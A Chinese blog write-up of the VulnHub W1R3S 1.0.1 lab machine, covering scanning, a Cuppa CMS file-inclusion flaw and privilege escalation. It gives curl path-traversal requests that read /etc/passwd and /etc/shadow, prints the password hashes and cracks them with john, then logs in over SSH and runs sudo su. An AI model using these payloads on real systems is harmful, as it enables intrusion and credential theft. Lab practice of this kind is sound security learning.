W1R3S: 1.0.1打靶渗透【附代码】(权限提升)

已于 2024-08-05 21:35:34 修改
阅读量146 收藏 2
点赞数 2
分类专栏: 打靶日常 文章标签: 笔记 学习 网络安全 网络 web安全
于 2024-08-05 21:34:14 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_52487093/article/details/140937510
版权

靶场下载地址:

https://www.vulnhub.com/entry/w1r3s-101,220/#downloadicon-default.png?t=N7T8https://www.vulnhub.com/entry/w1r3s-101,220/#download

1. 主机发现+端口扫描+目录扫描+信息收集

1.1. 主机发现

nmap -sn 192.168.7.0/24|grep -B 2 '00:0C:29:B4:57:C0'

1.2. 端口扫描

nmap -p- 192.168.7.94

1.3. 目录扫描

dirb http://192.168.7.94

1.4. 信息收集

whatweb 192.168.7.94

2. WEB打点寻找漏洞点+GetShell

2.1. 访问80端口页面

2.2. 逐个拼接目录

1.拼接/administrator

2.这是数据库的一个创建流程,页面title显示的是Cuppa CMS,可以通过cms来寻找Nday,使用kali的searchsploit工具来搜索Cuppa CMS所存在的历史漏洞

searchsploit cuppa

3.存在一个漏洞 -> 将25971.txt文件导出到桌面

searchsploit -m php/webapps/25971.txt

查看文件 -> 此漏洞主要是利用/alerts/alertConfigField.php文件urlConfig参数存在 LFI 漏洞,可以利用特殊的 url ,查看本地文件

cat 25971.txt

4.稍加改变,尝试拼接下面这些路径 -> 无信息

http://192.168.7.94/administrator/alerts/alertConfigField.php?urlConfig=../../../../../../../../../etc/passwd

源代码也无可用信息

5.综合利用文件包含漏洞中无回显的利用方式,尝试用curl下载信息 -> 成功,并且有个用户可能存在SUDO提权

curl -s --data-urlencode urlConfig=../../../../../../../../../etc/passwd http://192.168.7.94/administrator/alerts/alertConfigField.php

6.既然可以正常下载,争取获得更多有用的信息

# 获得存储密码的shadow文件
curl -s --data-urlencode urlConfig=../../../../../../../../../etc/shadow http://192.168.7.94/administrator/alerts/alertConfigField.php

7.shadow文件中有着root、www-data、w1r3s 三个用户的密码 -> 将其存储在password.txt文件中,尝试用 john 破解

root:$6$vYcecPCy$JNbK.hr7HU72ifLxmjpIP9kTcx./ak2MM3lBs.Ouiu0mENav72TfQIs8h1jPm2rwRFqd87HDC0pi7gn9t7VgZ0
www-data:$6$8JMxE7l0$yQ16jM..ZsFxpoGue8/0LBUnTas23zaOqg2Da47vmykGTANfutzM8MuFidtb0..Zk.TUKDoDAVRCoXiZAH.Ud1
w1r3s:$6$xe/eyoTx$gttdIYrxrstpJP97hWqttvc5cGzDNyMb0vSuppux4f2CcBv3FwOt2P1GFLjZdNqjwRuP3eUjkgb/io7x9q1iP.

利用john破解

john pas.txt
>>>
# www-data:www-data
# w1r3s:computer

2.3. GetShell

1.尝试用破解到的用户进行ssh连接【w1r3s:computer】

ssh w1r3s@192.168.7.94

3. 权限提升

老规矩,查看用户权限 -> 👏 舒服了,权限是all,直接提权! ->成功!

suod -l
sudo su

Kucei
关注
  • 2
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
解决Missing artifact javax.transaction:jta:jar:1.0.1B
12-12
1. 解压文件得到:jta-1_0_1B-classes.zip 2. cmd进入zip文件所在目录 ...mvn install:install-file -Dfile=./jta-1_0_1B-classes.zip -DgroupId=javax.transaction -DartifactId=jta -Dversion=1.0.1B -Dpackaging=jar
phpMyCore:1.0.1 Beta版
02-12
**phpMyCore 1.0.1 Beta版详解** phpMyCore是一款基于PHP语言开发的开源Web框架,专为构建动态网站和Web应用程序而设计。这个版本是1.0.1 Beta,意味着它是一个测试阶段的版本,可能包含一些已知或未知的问题,但...
红队打靶W1R3S: 1.0.1详细打靶思路(vulnhub)
Bossfrank的博客
05-30 3507
本文是vulnhub靶机W1R3S: 1.0.1详细打靶过程,使用kali进行渗透。不同于单纯的writeup,本文详细提供了渗透的思路和每一步的用意。
红队笔记-1:W1R3S: 1.0.1打靶流程(vulnhub)
qq_63442530的博客
03-13 987
1.主机发现&端口扫描:主机发现目标主机ip:192.168.254.141,发现存活端口:21(tcp)22(ssh) ,80(http),3306(mysql)
W1R3S: 1.0.1
Mysmycbx的博客
03-17 459
w1r3s 打靶全过程
打靶记录(一):vulnhub——w1r3s:1.0.1
pixelpoints的博客
12-30 1247
我们在之前的安装页面以及dirb扫出的路径下,发现了网站目录都是以administrator开头的,我们可以合理怀疑网站的根目录就是administrator目录,尝试一下。这里忘了截图,返回的信息告诉我们的数据库创建成功,但是adminsitrator账户没有创建成功,除此之外也没有其他信息了,只能点击back返回,显然此路不通。访问成功,路径是对的,但是没有内容,在25719.txt中提到了编码的问题,使用了php伪协议读取了文件内容,我们可以消效仿一下。
渗透靶场之W1R3S
m0_56190544的博客
06-26 447
完整的解析了vulnhub靶场中的W1R3S渗透过程,包括一些命令使用的细节,提供大家借鉴学习
打靶:vulnhub中的w1R3S
qq_73865998的博客
04-03 1905
复现视频:【「红队笔记」靶机精讲:W1R3S 1.0.1 - 渗透测试思路为王,细节多到即使对于纯萌新也能无感入圈。红队笔记(一个很宝藏的up主)。
渗透靶场-w1r3s 1.0.1靶场
久恙502的博客
09-17 120
记一次红队打靶渗透靶场-w1r3s 1.0.1靶场
mq-msgpush-sdk-1.0.1.jar
05-24
《mq-msgpush-sdk-1.0.1.jar:消息推送SDK详解及应用实践》 在IT行业中,消息推送服务已经成为应用程序与用户互动的关键组件。mq-msgpush-sdk-1.0.1.jar是一个专用于消息推送的Java软件开发工具包(SDK),它允许...
BOB1.0.1靶机渗透攻略.pdf
09-21
网络安全渗透kali实战,提供bob1.0.1靶场,环境,详细攻略
emas-services-1.0.1.jar
09-17
<!... ... <artifactId>emas-services <version>1.0.1 mvn install:install-file -DgroupId=com.aliyun.ams -DartifactId=emas-services -Dversion=1.0.1 -Dpackaging=jar -Dfile=F:\jars\emas-services-1.0.1.jar
鸿蒙笔记--装饰器
ljt2724960661的博客
08-04 193
这一节主要了解一下鸿蒙里的装饰器,装饰器是一种特殊的语法结构...
LeetCode刷题笔记 | 3 | 无重复字符的最长子串 | 双指针 | 滑动窗口 | 2025兴业银行秋招笔试题 | 哈希集合
神马都会亿点点的毛毛张
08-04 807
这是一道银行的面试题,就是简单?!
学习笔记--算法(双指针)2
weixin_71085457的博客
08-01 594
学习笔记,自用!!
【机器学习西瓜书学习笔记——贝叶斯分类器】
最新发布
m0_51148715的博客
08-04 724
贝叶斯网络,又称信念网络,或有向无环图模型,是一种系统地描述随机变量之间关系的语言。DAG中节点表示随机变量,边表示变量之间的依赖关系。条件概率表中的每一个元素对应DAG中唯一的节点,存储此节点对于其所有直接前驱节点的联合条件概率。从不完全数据或有数据丢失的数据集(存在隐含变量)中求解概率模型参数的最大似然估计方法。
[Kimi 笔记]“面向搜索引擎”
m0_74331272的博客
08-04 162
"面向搜索引擎"(Search Engine-Oriented,SEO-Oriented 或 SEO-Friendly)通常指的是在设计和开发网站时,采取一系列措施来优化网站内容和结构,以便提高网站在搜索引擎结果页面(SERP)中的排名。面向搜索引擎的设计和开发有助于提高网站的可见性,吸引更多的有机流量,最终可能提高转化率和收益。7. 页面加载速度:提高网站的加载速度,因为搜索引擎倾向于对加载速度快的网站给予更好的排名。3. 网站结构:确保网站有清晰的层次结构和导航,使搜索引擎容易抓取和索引网站内容。
物理笔记-八年级上册
m0_69379426的博客
08-01 314
电学,力学,声学,光学,热学。
b2b-communication-api:1.0.1.jar
12-16
b2b-communication-api:1.0.1.jar 是一个B2B(企业对企业)通信接口的Java库,版本号为1.0.1。 这个API库旨在提供企业之间的通信接口,帮助不同的企业系统进行数据交换、通信和合作。它提供了一系列的函数和方法,使得企业可以轻松地与其他企业建立通信连接,并交换各种数据类型,如订单、发票、库存等等。 它的主要特点和功能包括: - 提供了一套统一的接口和协议,使得企业间通信更加方便和高效。 - 支持多种通信协议,例如HTTP、SOAP、REST等,以满足不同企业系统的需求。 - 具有消息传递和异步通知的功能,可以实现实时的数据交换和与其他企业系统的同步。 - 提供了数据加密和安全认证机制,确保数据传输的安全性和完整性。 - 可以灵活地扩展和定制,以满足企业的特定要求和业务流程。 - 提供了详细的文档和示例代码,方便企业开发人员快速上手和集成到现有系统中。 通过使用b2b-communication-api:1.0.1.jar,企业可以实现与其他企业的便捷通信,提高合作效率,加强业务合作关系,并降低数据传输和通信的成本。这个API库的引入可以使得企业间的通信更加简单、高效和安全
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Kucei

感谢您的喜欢

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值